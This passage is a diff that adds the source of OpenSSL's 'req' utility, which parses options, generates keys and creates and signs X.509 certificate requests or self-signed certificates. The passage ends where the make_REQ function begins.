+#ifdef OPENSSL_NO_DEPRECATED
+# undef OPENSSL_NO_DEPRECATED
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+#include <string.h>
+#ifdef OPENSSL_NO_STDIO
+# define APPS_WIN16
+#endif
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/evp.h>
+#include <openssl/conf.h>
+#include <openssl/err.h>
+#include <openssl/asn1.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/objects.h>
+#include <openssl/pem.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+
+#define SECTION         "req"
+
+#define BITS            "default_bits"
+#define KEYFILE         "default_keyfile"
+#define PROMPT          "prompt"
+#define DISTINGUISHED_NAME      "distinguished_name"
+#define ATTRIBUTES      "attributes"
+#define V3_EXTENSIONS   "x509_extensions"
+#define REQ_EXTENSIONS  "req_extensions"
+#define STRING_MASK     "string_mask"
+#define UTF8_IN         "utf8"
+
+#define DEFAULT_KEY_LENGTH      512
+#define MIN_KEY_LENGTH          384
+
+#undef PROG
+#define PROG    req_main
+
+/*-
+ * -inform arg  - input format - default PEM (DER or PEM)
+ * -outform arg - output format - default PEM
+ * -in arg      - input file - default stdin
+ * -out arg     - output file - default stdout
+ * -verify      - check request signature
+ * -noout       - don't print stuff out.
+ * -text        - print out human readable text.
+ * -nodes       - no des encryption
+ * -config file - Load configuration file.
+ * -key file    - make a request using key in file (or use it for verification).
+ * -keyform arg - key file format.
+ * -rand file(s) - load the file(s) into the PRNG.
+ * -newkey      - make a key and a request.
+ * -modulus     - print RSA modulus.
+ * -pubkey      - output Public Key.
+ * -x509        - output a self signed X509 structure instead.
+ * -asn1-kludge - output new certificate request in a format that some CA's
+ *                require.  This format is wrong
+ */
+
+static int make_REQ(X509_REQ *req, EVP_PKEY *pkey, char *dn, int mutlirdn,
+                    int attribs, unsigned long chtype);
+static int build_subject(X509_REQ *req, char *subj, unsigned long chtype,
+                         int multirdn);
+static int prompt_info(X509_REQ *req,
+                       STACK_OF(CONF_VALUE) *dn_sk, char *dn_sect,
+                       STACK_OF(CONF_VALUE) *attr_sk, char *attr_sect,
+                       int attribs, unsigned long chtype);
+static int auto_info(X509_REQ *req, STACK_OF(CONF_VALUE) *sk,
+                     STACK_OF(CONF_VALUE) *attr, int attribs,
+                     unsigned long chtype);
+static int add_attribute_object(X509_REQ *req, char *text, const char *def,
+                                char *value, int nid, int n_min, int n_max,
+                                unsigned long chtype);
+static int add_DN_object(X509_NAME *n, char *text, const char *def,
+                         char *value, int nid, int n_min, int n_max,
+                         unsigned long chtype, int mval);
+static int genpkey_cb(EVP_PKEY_CTX *ctx);
+static int req_check_len(int len, int n_min, int n_max);
+static int check_end(const char *str, const char *end);
+static EVP_PKEY_CTX *set_keygen_ctx(BIO *err, const char *gstr,
+                                    int *pkey_type, long *pkeylen,
+                                    char **palgnam, ENGINE *keygen_engine);
+#ifndef MONOLITH
+static char *default_config_file = NULL;
+#endif
+static CONF *req_conf = NULL;
+static int batch = 0;
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL, *gen_eng = NULL;
+    unsigned long nmflag = 0, reqflag = 0;
+    int ex = 1, x509 = 0, days = 30;
+    X509 *x509ss = NULL;
+    X509_REQ *req = NULL;
+    EVP_PKEY_CTX *genctx = NULL;
+    const char *keyalg = NULL;
+    char *keyalgstr = NULL;
+    STACK_OF(OPENSSL_STRING) *pkeyopts = NULL, *sigopts = NULL;
+    EVP_PKEY *pkey = NULL;
+    int i = 0, badops = 0, newreq = 0, verbose = 0, pkey_type = -1;
+    long newkey = -1;
+    BIO *in = NULL, *out = NULL;
+    int informat, outformat, verify = 0, noout = 0, text = 0, keyform =
+        FORMAT_PEM;
+    int nodes = 0, kludge = 0, newhdr = 0, subject = 0, pubkey = 0;
+    char *infile, *outfile, *prog, *keyfile = NULL, *template =
+        NULL, *keyout = NULL;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+    char *extensions = NULL;
+    char *req_exts = NULL;
+    const EVP_CIPHER *cipher = NULL;
+    ASN1_INTEGER *serial = NULL;
+    int modulus = 0;
+    char *inrand = NULL;
+    char *passargin = NULL, *passargout = NULL;
+    char *passin = NULL, *passout = NULL;
+    char *p;
+    char *subj = NULL;
+    int multirdn = 0;
+    const EVP_MD *md_alg = NULL, *digest = NULL;
+    unsigned long chtype = MBSTRING_ASC;
+#ifndef MONOLITH
+    char *to_free;
+    long errline;
+#endif
+
+    req_conf = NULL;
+#ifndef OPENSSL_NO_DES
+    cipher = EVP_des_ede3_cbc();
+#endif
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    infile = NULL;
+    outfile = NULL;
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        } else if (strcmp(*argv, "-keygen_engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            gen_eng = ENGINE_by_id(*(++argv));
+            if (gen_eng == NULL) {
+                BIO_printf(bio_err, "Can't find keygen engine %s\n", *argv);
+                goto end;
+            }
+        }
+#endif
+        else if (strcmp(*argv, "-key") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyfile = *(++argv);
+        } else if (strcmp(*argv, "-pubkey") == 0) {
+            pubkey = 1;
+        } else if (strcmp(*argv, "-new") == 0) {
+            newreq = 1;
+        } else if (strcmp(*argv, "-config") == 0) {
+            if (--argc < 1)
+                goto bad;
+            template = *(++argv);
+        } else if (strcmp(*argv, "-keyform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyform = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-keyout") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyout = *(++argv);
+        } else if (strcmp(*argv, "-passin") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargin = *(++argv);
+        } else if (strcmp(*argv, "-passout") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargout = *(++argv);
+        } else if (strcmp(*argv, "-rand") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inrand = *(++argv);
+        } else if (strcmp(*argv, "-newkey") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyalg = *(++argv);
+            newreq = 1;
+        } else if (strcmp(*argv, "-pkeyopt") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!pkeyopts)
+                pkeyopts = sk_OPENSSL_STRING_new_null();
+            if (!pkeyopts || !sk_OPENSSL_STRING_push(pkeyopts, *(++argv)))
+                goto bad;
+        } else if (strcmp(*argv, "-sigopt") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!sigopts)
+                sigopts = sk_OPENSSL_STRING_new_null();
+            if (!sigopts || !sk_OPENSSL_STRING_push(sigopts, *(++argv)))
+                goto bad;
+        } else if (strcmp(*argv, "-batch") == 0)
+            batch = 1;
+        else if (strcmp(*argv, "-newhdr") == 0)
+            newhdr = 1;
+        else if (strcmp(*argv, "-modulus") == 0)
+            modulus = 1;
+        else if (strcmp(*argv, "-verify") == 0)
+            verify = 1;
+        else if (strcmp(*argv, "-nodes") == 0)
+            nodes = 1;
+        else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else if (strcmp(*argv, "-verbose") == 0)
+            verbose = 1;
+        else if (strcmp(*argv, "-utf8") == 0)
+            chtype = MBSTRING_UTF8;
+        else if (strcmp(*argv, "-nameopt") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!set_name_ex(&nmflag, *(++argv)))
+                goto bad;
+        } else if (strcmp(*argv, "-reqopt") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!set_cert_ex(&reqflag, *(++argv)))
+                goto bad;
+        } else if (strcmp(*argv, "-subject") == 0)
+            subject = 1;
+        else if (strcmp(*argv, "-text") == 0)
+            text = 1;
+        else if (strcmp(*argv, "-x509") == 0)
+            x509 = 1;
+        else if (strcmp(*argv, "-asn1-kludge") == 0)
+            kludge = 1;
+        else if (strcmp(*argv, "-no-asn1-kludge") == 0)
+            kludge = 0;
+        else if (strcmp(*argv, "-subj") == 0) {
+            if (--argc < 1)
+                goto bad;
+            subj = *(++argv);
+        } else if (strcmp(*argv, "-multivalue-rdn") == 0)
+            multirdn = 1;
+        else if (strcmp(*argv, "-days") == 0) {
+            if (--argc < 1)
+                goto bad;
+            days = atoi(*(++argv));
+            if (days == 0)
+                days = 30;
+        } else if (strcmp(*argv, "-set_serial") == 0) {
+            if (--argc < 1)
+                goto bad;
+            serial = s2i_ASN1_INTEGER(NULL, *(++argv));
+            if (!serial)
+                goto bad;
+        } else if (strcmp(*argv, "-extensions") == 0) {
+            if (--argc < 1)
+                goto bad;
+            extensions = *(++argv);
+        } else if (strcmp(*argv, "-reqexts") == 0) {
+            if (--argc < 1)
+                goto bad;
+            req_exts = *(++argv);
+        } else if ((md_alg = EVP_get_digestbyname(&((*argv)[1]))) != NULL) {
+            /* ok */
+            digest = md_alg;
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] <infile >outfile\n", prog);
+        BIO_printf(bio_err, "where options  are\n");
+        BIO_printf(bio_err, " -inform arg    input format - DER or PEM\n");
+        BIO_printf(bio_err, " -outform arg   output format - DER or PEM\n");
+        BIO_printf(bio_err, " -in arg        input file\n");
+        BIO_printf(bio_err, " -out arg       output file\n");
+        BIO_printf(bio_err, " -text          text form of request\n");
+        BIO_printf(bio_err, " -pubkey        output public key\n");
+        BIO_printf(bio_err, " -noout         do not output REQ\n");
+        BIO_printf(bio_err, " -verify        verify signature on REQ\n");
+        BIO_printf(bio_err, " -modulus       RSA modulus\n");
+        BIO_printf(bio_err, " -nodes         don't encrypt the output key\n");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e      use engine e, possibly a hardware device\n");
+#endif
+        BIO_printf(bio_err, " -subject       output the request's subject\n");
+        BIO_printf(bio_err, " -passin        private key password source\n");
+        BIO_printf(bio_err,
+                   " -key file      use the private key contained in file\n");
+        BIO_printf(bio_err, " -keyform arg   key file format\n");
+        BIO_printf(bio_err, " -keyout arg    file to send the key to\n");
+        BIO_printf(bio_err, " -rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+                   LIST_SEPARATOR_CHAR);
+        BIO_printf(bio_err,
+                   "                load the file (or the files in the directory) into\n");
+        BIO_printf(bio_err, "                the random number generator\n");
+        BIO_printf(bio_err,
+                   " -newkey rsa:bits generate a new RSA key of 'bits' in size\n");
+        BIO_printf(bio_err,
+                   " -newkey dsa:file generate a new DSA key, parameters taken from CA in 'file'\n");
+#ifndef OPENSSL_NO_ECDSA
+        BIO_printf(bio_err,
+                   " -newkey ec:file generate a new EC key, parameters taken from CA in 'file'\n");
+#endif
+        BIO_printf(bio_err,
+                   " -[digest]      Digest to sign with (md5, sha1, md2, mdc2, md4)\n");
+        BIO_printf(bio_err, " -config file   request template file.\n");
+        BIO_printf(bio_err,
+                   " -subj arg      set or modify request subject\n");
+        BIO_printf(bio_err,
+                   " -multivalue-rdn enable support for multivalued RDNs\n");
+        BIO_printf(bio_err, " -new           new request.\n");
+        BIO_printf(bio_err,
+                   " -batch         do not ask anything during request generation\n");
+        BIO_printf(bio_err,
+                   " -x509          output a x509 structure instead of a cert. req.\n");
+        BIO_printf(bio_err,
+                   " -days          number of days a certificate generated by -x509 is valid for.\n");
+        BIO_printf(bio_err,
+                   " -set_serial    serial number to use for a certificate generated by -x509.\n");
+        BIO_printf(bio_err,
+                   " -newhdr        output \"NEW\" in the header lines\n");
+        BIO_printf(bio_err,
+                   " -asn1-kludge   Output the 'request' in a format that is wrong but some CA's\n");
+        BIO_printf(bio_err,
+                   "                have been reported as requiring\n");
+        BIO_printf(bio_err,
+                   " -extensions .. specify certificate extension section (override value in config file)\n");
+        BIO_printf(bio_err,
+                   " -reqexts ..    specify request extension section (override value in config file)\n");
+        BIO_printf(bio_err,
+                   " -utf8          input characters are UTF8 (default ASCII)\n");
+        BIO_printf(bio_err,
+                   " -nameopt arg    - various certificate name options\n");
+        BIO_printf(bio_err,
+                   " -reqopt arg    - various request text options\n\n");
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+    if (!app_passwd(bio_err, passargin, passargout, &passin, &passout)) {
+        BIO_printf(bio_err, "Error getting passwords\n");
+        goto end;
+    }
+#ifndef MONOLITH                /* else this has happened in openssl.c
+                                 * (global `config') */
+    /* Lets load up our environment a little */
+    p = getenv("OPENSSL_CONF");
+    if (p == NULL)
+        p = getenv("SSLEAY_CONF");
+    if (p == NULL)
+        p = to_free = make_config_name();
+    default_config_file = p;
+    config = NCONF_new(NULL);
+    i = NCONF_load(config, p, &errline);
+#endif
+
+    if (template != NULL) {
+        long errline = -1;
+
+        if (verbose)
+            BIO_printf(bio_err, "Using configuration from %s\n", template);
+        req_conf = NCONF_new(NULL);
+        i = NCONF_load(req_conf, template, &errline);
+        if (i == 0) {
+            BIO_printf(bio_err, "error on line %ld of %s\n", errline,
+                       template);
+            goto end;
+        }
+    } else {
+        req_conf = config;
+
+        if (req_conf == NULL) {
+            BIO_printf(bio_err, "Unable to load config info from %s\n",
+                       default_config_file);
+            if (newreq)
+                goto end;
+        } else if (verbose)
+            BIO_printf(bio_err, "Using configuration from %s\n",
+                       default_config_file);
+    }
+
+    if (req_conf != NULL) {
+        if (!load_config(bio_err, req_conf))
+            goto end;
+        p = NCONF_get_string(req_conf, NULL, "oid_file");
+        if (p == NULL)
+            ERR_clear_error();
+        if (p != NULL) {
+            BIO *oid_bio;
+
+            oid_bio = BIO_new_file(p, "r");
+            if (oid_bio == NULL) {
+                /*-
+                BIO_printf(bio_err,"problems opening %s for extra oid's\n",p);
+                ERR_print_errors(bio_err);
+                */
+            } else {
+                OBJ_create_objects(oid_bio);
+                BIO_free(oid_bio);
+            }
+        }
+    }
+    if (!add_oid_section(bio_err, req_conf))
+        goto end;
+
+    if (md_alg == NULL) {
+        p = NCONF_get_string(req_conf, SECTION, "default_md");
+        if (p == NULL)
+            ERR_clear_error();
+        if (p != NULL) {
+            if ((md_alg = EVP_get_digestbyname(p)) != NULL)
+                digest = md_alg;
+        }
+    }
+
+    if (!extensions) {
+        extensions = NCONF_get_string(req_conf, SECTION, V3_EXTENSIONS);
+        if (!extensions)
+            ERR_clear_error();
+    }
+    if (extensions) {
+        /* Check syntax of file */
+        X509V3_CTX ctx;
+        X509V3_set_ctx_test(&ctx);
+        X509V3_set_nconf(&ctx, req_conf);
+        if (!X509V3_EXT_add_nconf(req_conf, &ctx, extensions, NULL)) {
+            BIO_printf(bio_err,
+                       "Error Loading extension section %s\n", extensions);
+            goto end;
+        }
+    }
+
+    if (!passin) {
+        passin = NCONF_get_string(req_conf, SECTION, "input_password");
+        if (!passin)
+            ERR_clear_error();
+    }
+
+    if (!passout) {
+        passout = NCONF_get_string(req_conf, SECTION, "output_password");
+        if (!passout)
+            ERR_clear_error();
+    }
+
+    p = NCONF_get_string(req_conf, SECTION, STRING_MASK);
+    if (!p)
+        ERR_clear_error();
+
+    if (p && !ASN1_STRING_set_default_mask_asc(p)) {
+        BIO_printf(bio_err, "Invalid global string mask setting %s\n", p);
+        goto end;
+    }
+
+    if (chtype != MBSTRING_UTF8) {
+        p = NCONF_get_string(req_conf, SECTION, UTF8_IN);
+        if (!p)
+            ERR_clear_error();
+        else if (!strcmp(p, "yes"))
+            chtype = MBSTRING_UTF8;
+    }
+
+    if (!req_exts) {
+        req_exts = NCONF_get_string(req_conf, SECTION, REQ_EXTENSIONS);
+        if (!req_exts)
+            ERR_clear_error();
+    }
+    if (req_exts) {
+        /* Check syntax of file */
+        X509V3_CTX ctx;
+        X509V3_set_ctx_test(&ctx);
+        X509V3_set_nconf(&ctx, req_conf);
+        if (!X509V3_EXT_add_nconf(req_conf, &ctx, req_exts, NULL)) {
+            BIO_printf(bio_err,
+                       "Error Loading request extension section %s\n",
+                       req_exts);
+            goto end;
+        }
+    }
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL))
+        goto end;
+
+#ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+#endif
+
+    if (keyfile != NULL) {
+        pkey = load_key(bio_err, keyfile, keyform, 0, passin, e,
+                        "Private Key");
+        if (!pkey) {
+            /*
+             * load_key() has already printed an appropriate message
+             */
+            goto end;
+        } else {
+            char *randfile = NCONF_get_string(req_conf, SECTION, "RANDFILE");
+            if (randfile == NULL)
+                ERR_clear_error();
+            app_RAND_load_file(randfile, bio_err, 0);
+        }
+    }
+
+    if (newreq && (pkey == NULL)) {
+        char *randfile = NCONF_get_string(req_conf, SECTION, "RANDFILE");
+        if (randfile == NULL)
+            ERR_clear_error();
+        app_RAND_load_file(randfile, bio_err, 0);
+        if (inrand)
+            app_RAND_load_files(inrand);
+
+        if (!NCONF_get_number(req_conf, SECTION, BITS, &newkey)) {
+            newkey = DEFAULT_KEY_LENGTH;
+        }
+
+        if (keyalg) {
+            genctx = set_keygen_ctx(bio_err, keyalg, &pkey_type, &newkey,
+                                    &keyalgstr, gen_eng);
+            if (!genctx)
+                goto end;
+        }
+
+        if (newkey < MIN_KEY_LENGTH
+            && (pkey_type == EVP_PKEY_RSA || pkey_type == EVP_PKEY_DSA)) {
+            BIO_printf(bio_err, "private key length is too short,\n");
+            BIO_printf(bio_err, "it needs to be at least %d bits, not %ld\n",
+                       MIN_KEY_LENGTH, newkey);
+            goto end;
+        }
+
+        if (!genctx) {
+            genctx = set_keygen_ctx(bio_err, NULL, &pkey_type, &newkey,
+                                    &keyalgstr, gen_eng);
+            if (!genctx)
+                goto end;
+        }
+
+        if (pkeyopts) {
+            char *genopt;
+            for (i = 0; i < sk_OPENSSL_STRING_num(pkeyopts); i++) {
+                genopt = sk_OPENSSL_STRING_value(pkeyopts, i);
+                if (pkey_ctrl_string(genctx, genopt) <= 0) {
+                    BIO_printf(bio_err, "parameter error \"%s\"\n", genopt);
+                    ERR_print_errors(bio_err);
+                    goto end;
+                }
+            }
+        }
+
+        BIO_printf(bio_err, "Generating a %ld bit %s private key\n",
+                   newkey, keyalgstr);
+
+        EVP_PKEY_CTX_set_cb(genctx, genpkey_cb);
+        EVP_PKEY_CTX_set_app_data(genctx, bio_err);
+
+        if (EVP_PKEY_keygen(genctx, &pkey) <= 0) {
+            BIO_puts(bio_err, "Error Generating Key\n");
+            goto end;
+        }
+
+        EVP_PKEY_CTX_free(genctx);
+        genctx = NULL;
+
+        app_RAND_write_file(randfile, bio_err);
+
+        if (keyout == NULL) {
+            keyout = NCONF_get_string(req_conf, SECTION, KEYFILE);
+            if (keyout == NULL)
+                ERR_clear_error();
+        }
+
+        if (keyout == NULL) {
+            BIO_printf(bio_err, "writing new private key to stdout\n");
+            BIO_set_fp(out, stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+            {
+                BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+                out = BIO_push(tmpbio, out);
+            }
+#endif
+        } else {
+            BIO_printf(bio_err, "writing new private key to '%s'\n", keyout);
+            if (BIO_write_filename(out, keyout) <= 0) {
+                perror(keyout);
+                goto end;
+            }
+        }
+
+        p = NCONF_get_string(req_conf, SECTION, "encrypt_rsa_key");
+        if (p == NULL) {
+            ERR_clear_error();
+            p = NCONF_get_string(req_conf, SECTION, "encrypt_key");
+            if (p == NULL)
+                ERR_clear_error();
+        }
+        if ((p != NULL) && (strcmp(p, "no") == 0))
+            cipher = NULL;
+        if (nodes)
+            cipher = NULL;
+
+        i = 0;
+ loop:
+        if (!PEM_write_bio_PrivateKey(out, pkey, cipher,
+                                      NULL, 0, NULL, passout)) {
+            if ((ERR_GET_REASON(ERR_peek_error()) ==
+                 PEM_R_PROBLEMS_GETTING_PASSWORD) && (i < 3)) {
+                ERR_clear_error();
+                i++;
+                goto loop;
+            }
+            goto end;
+        }
+        BIO_printf(bio_err, "-----\n");
+    }
+
+    if (!newreq) {
+        /*
+         * Since we are using a pre-existing certificate request, the kludge
+         * 'format' info should not be changed.
+         */
+        kludge = -1;
+        if (infile == NULL)
+            BIO_set_fp(in, stdin, BIO_NOCLOSE);
+        else {
+            if (BIO_read_filename(in, infile) <= 0) {
+                perror(infile);
+                goto end;
+            }
+        }
+
+        if (informat == FORMAT_ASN1)
+            req = d2i_X509_REQ_bio(in, NULL);
+        else if (informat == FORMAT_PEM)
+            req = PEM_read_bio_X509_REQ(in, NULL, NULL, NULL);
+        else {
+            BIO_printf(bio_err,
+                       "bad input format specified for X509 request\n");
+            goto end;
+        }
+        if (req == NULL) {
+            BIO_printf(bio_err, "unable to load X509 request\n");
+            goto end;
+        }
+    }
+
+    if (newreq || x509) {
+        if (pkey == NULL) {
+            BIO_printf(bio_err, "you need to specify a private key\n");
+            goto end;
+        }
+
+        if (req == NULL) {
+            req = X509_REQ_new();
+            if (req == NULL) {
+                goto end;
+            }
+
+            i = make_REQ(req, pkey, subj, multirdn, !x509, chtype);
+            subj = NULL;        /* done processing '-subj' option */
+            if ((kludge > 0)
+                && !sk_X509_ATTRIBUTE_num(req->req_info->attributes)) {
+                sk_X509_ATTRIBUTE_free(req->req_info->attributes);
+                req->req_info->attributes = NULL;
+            }
+            if (!i) {
+                BIO_printf(bio_err, "problems making Certificate Request\n");
+                goto end;
+            }
+        }
+        if (x509) {
+            EVP_PKEY *tmppkey;
+            X509V3_CTX ext_ctx;
+            if ((x509ss = X509_new()) == NULL)
+                goto end;
+
+            /* Set version to V3 */
+            if (extensions && !X509_set_version(x509ss, 2))
+                goto end;
+            if (serial) {
+                if (!X509_set_serialNumber(x509ss, serial))
+                    goto end;
+            } else {
+                if (!rand_serial(NULL, X509_get_serialNumber(x509ss)))
+                    goto end;
+            }
+
+            if (!X509_set_issuer_name(x509ss, X509_REQ_get_subject_name(req)))
+                goto end;
+            if (!X509_gmtime_adj(X509_get_notBefore(x509ss), 0))
+                goto end;
+            if (!X509_time_adj_ex(X509_get_notAfter(x509ss), days, 0, NULL))
+                goto end;
+            if (!X509_set_subject_name
+                (x509ss, X509_REQ_get_subject_name(req)))
+                goto end;
+            tmppkey = X509_REQ_get_pubkey(req);
+            if (!tmppkey || !X509_set_pubkey(x509ss, tmppkey))
+                goto end;
+            EVP_PKEY_free(tmppkey);
+
+            /* Set up V3 context struct */
+
+            X509V3_set_ctx(&ext_ctx, x509ss, x509ss, NULL, NULL, 0);
+            X509V3_set_nconf(&ext_ctx, req_conf);
+
+            /* Add extensions */
+            if (extensions && !X509V3_EXT_add_nconf(req_conf,
+                                                    &ext_ctx, extensions,
+                                                    x509ss)) {
+                BIO_printf(bio_err, "Error Loading extension section %s\n",
+                           extensions);
+                goto end;
+            }
+
+            i = do_X509_sign(bio_err, x509ss, pkey, digest, sigopts);
+            if (!i) {
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        } else {
+            X509V3_CTX ext_ctx;
+
+            /* Set up V3 context struct */
+
+            X509V3_set_ctx(&ext_ctx, NULL, NULL, req, NULL, 0);
+            X509V3_set_nconf(&ext_ctx, req_conf);
+
+            /* Add extensions */
+            if (req_exts && !X509V3_EXT_REQ_add_nconf(req_conf,
+                                                      &ext_ctx, req_exts,
+                                                      req)) {
+                BIO_printf(bio_err, "Error Loading extension section %s\n",
+                           req_exts);
+                goto end;
+            }
+            i = do_X509_REQ_sign(bio_err, req, pkey, digest, sigopts);
+            if (!i) {
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        }
+    }
+
+    if (subj && x509) {
+        BIO_printf(bio_err, "Cannot modifiy certificate subject\n");
+        goto end;
+    }
+
+    if (subj && !x509) {
+        if (verbose) {
+            BIO_printf(bio_err, "Modifying Request's Subject\n");
+            print_name(bio_err, "old subject=",
+                       X509_REQ_get_subject_name(req), nmflag);
+        }
+
+        if (build_subject(req, subj, chtype, multirdn) == 0) {
+            BIO_printf(bio_err, "ERROR: cannot modify subject\n");
+            ex = 1;
+            goto end;
+        }
+
+        req->req_info->enc.modified = 1;
+
+        if (verbose) {
+            print_name(bio_err, "new subject=",
+                       X509_REQ_get_subject_name(req), nmflag);
+        }
+    }
+
+    if (verify && !x509) {
+        int tmp = 0;
+
+        if (pkey == NULL) {
+            pkey = X509_REQ_get_pubkey(req);
+            tmp = 1;
+            if (pkey == NULL)
+                goto end;
+        }
+
+        i = X509_REQ_verify(req, pkey);
+        if (tmp) {
+            EVP_PKEY_free(pkey);
+            pkey = NULL;
+        }
+
+        if (i < 0) {
+            goto end;
+        } else if (i == 0) {
+            BIO_printf(bio_err, "verify failure\n");
+            ERR_print_errors(bio_err);
+        } else                  /* if (i > 0) */
+            BIO_printf(bio_err, "verify OK\n");
+    }
+
+    if (noout && !text && !modulus && !subject && !pubkey) {
+        ex = 0;
+        goto end;
+    }
+
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    } else {
+        if ((keyout != NULL) && (strcmp(outfile, keyout) == 0))
+            i = (int)BIO_append_filename(out, outfile);
+        else
+            i = (int)BIO_write_filename(out, outfile);
+        if (!i) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    if (pubkey) {
+        EVP_PKEY *tpubkey;
+        tpubkey = X509_REQ_get_pubkey(req);
+        if (tpubkey == NULL) {
+            BIO_printf(bio_err, "Error getting public key\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        PEM_write_bio_PUBKEY(out, tpubkey);
+        EVP_PKEY_free(tpubkey);
+    }
+
+    if (text) {
+        if (x509)
+            X509_print_ex(out, x509ss, nmflag, reqflag);
+        else
+            X509_REQ_print_ex(out, req, nmflag, reqflag);
+    }
+
+    if (subject) {
+        if (x509)
+            print_name(out, "subject=", X509_get_subject_name(x509ss),
+                       nmflag);
+        else
+            print_name(out, "subject=", X509_REQ_get_subject_name(req),
+                       nmflag);
+    }
+
+    if (modulus) {
+        EVP_PKEY *tpubkey;
+
+        if (x509)
+            tpubkey = X509_get_pubkey(x509ss);
+        else
+            tpubkey = X509_REQ_get_pubkey(req);
+        if (tpubkey == NULL) {
+            fprintf(stdout, "Modulus=unavailable\n");
+            goto end;
+        }
+        fprintf(stdout, "Modulus=");
+#ifndef OPENSSL_NO_RSA
+        if (EVP_PKEY_base_id(tpubkey) == EVP_PKEY_RSA)
+            BN_print(out, tpubkey->pkey.rsa->n);
+        else
+#endif
+            fprintf(stdout, "Wrong Algorithm type");
+        EVP_PKEY_free(tpubkey);
+        fprintf(stdout, "\n");
+    }
+
+    if (!noout && !x509) {
+        if (outformat == FORMAT_ASN1)
+            i = i2d_X509_REQ_bio(out, req);
+        else if (outformat == FORMAT_PEM) {
+            if (newhdr)
+                i = PEM_write_bio_X509_REQ_NEW(out, req);
+            else
+                i = PEM_write_bio_X509_REQ(out, req);
+        } else {
+            BIO_printf(bio_err, "bad output format specified for outfile\n");
+            goto end;
+        }
+        if (!i) {
+            BIO_printf(bio_err, "unable to write X509 request\n");
+            goto end;
+        }
+    }
+    if (!noout && x509 && (x509ss != NULL)) {
+        if (outformat == FORMAT_ASN1)
+            i = i2d_X509_bio(out, x509ss);
+        else if (outformat == FORMAT_PEM)
+            i = PEM_write_bio_X509(out, x509ss);
+        else {
+            BIO_printf(bio_err, "bad output format specified for outfile\n");
+            goto end;
+        }
+        if (!i) {
+            BIO_printf(bio_err, "unable to write X509 certificate\n");
+            goto end;
+        }
+    }
+    ex = 0;
+ end:
+#ifndef MONOLITH
+    if (to_free)
+        OPENSSL_free(to_free);
+#endif
+    if (ex) {
+        ERR_print_errors(bio_err);
+    }
+    if ((req_conf != NULL) && (req_conf != config))
+        NCONF_free(req_conf);
+    BIO_free(in);
+    BIO_free_all(out);
+    EVP_PKEY_free(pkey);
+    if (genctx)
+        EVP_PKEY_CTX_free(genctx);
+    if (pkeyopts)
+        sk_OPENSSL_STRING_free(pkeyopts);
+    if (sigopts)
+        sk_OPENSSL_STRING_free(sigopts);
+#ifndef OPENSSL_NO_ENGINE
+    if (gen_eng)
+        ENGINE_free(gen_eng);
+#endif
+    if (keyalgstr)
+        OPENSSL_free(keyalgstr);
+    X509_REQ_free(req);
+    X509_free(x509ss);
+    ASN1_INTEGER_free(serial);
+    if (passargin && passin)
+        OPENSSL_free(passin);
+    if (passargout && passout)
+        OPENSSL_free(passout);
+    OBJ_cleanup();
+    apps_shutdown();
+    OPENSSL_EXIT(ex);
+}
+
+static int make_REQ(X509_REQ *req, EVP_PKEY *pkey, char *subj, int multirdn,
